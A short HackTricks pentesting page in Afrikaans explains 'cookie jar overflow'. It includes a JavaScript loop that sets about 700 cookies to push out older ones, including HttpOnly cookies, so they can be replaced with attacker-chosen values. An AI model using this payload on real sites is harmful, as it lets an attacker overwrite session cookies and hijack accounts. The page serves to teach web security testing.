Cookie Jar Overflow

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Die webblaaier het 'n limiet op die aantal koekies wat hulle kan stoor vir 'n bladsy. As jy dus om een of ander rede 'n koekie wil laat verdwyn, kan jy die koekiehouer oorvloei aangesien die oudste een vooraf verwyder sal word:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Let daarop dat derdeparty-koekies wat na 'n ander domein verwys nie oorskryf sal word nie.

Hierdie aanval kan ook gebruik word om HttpOnly-koekies te oorskryf, aangesien jy dit kan verwyder en dan herstel met die waarde wat jy wil hê.

Kyk hierna in hierdie pos met 'n laboratorium.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated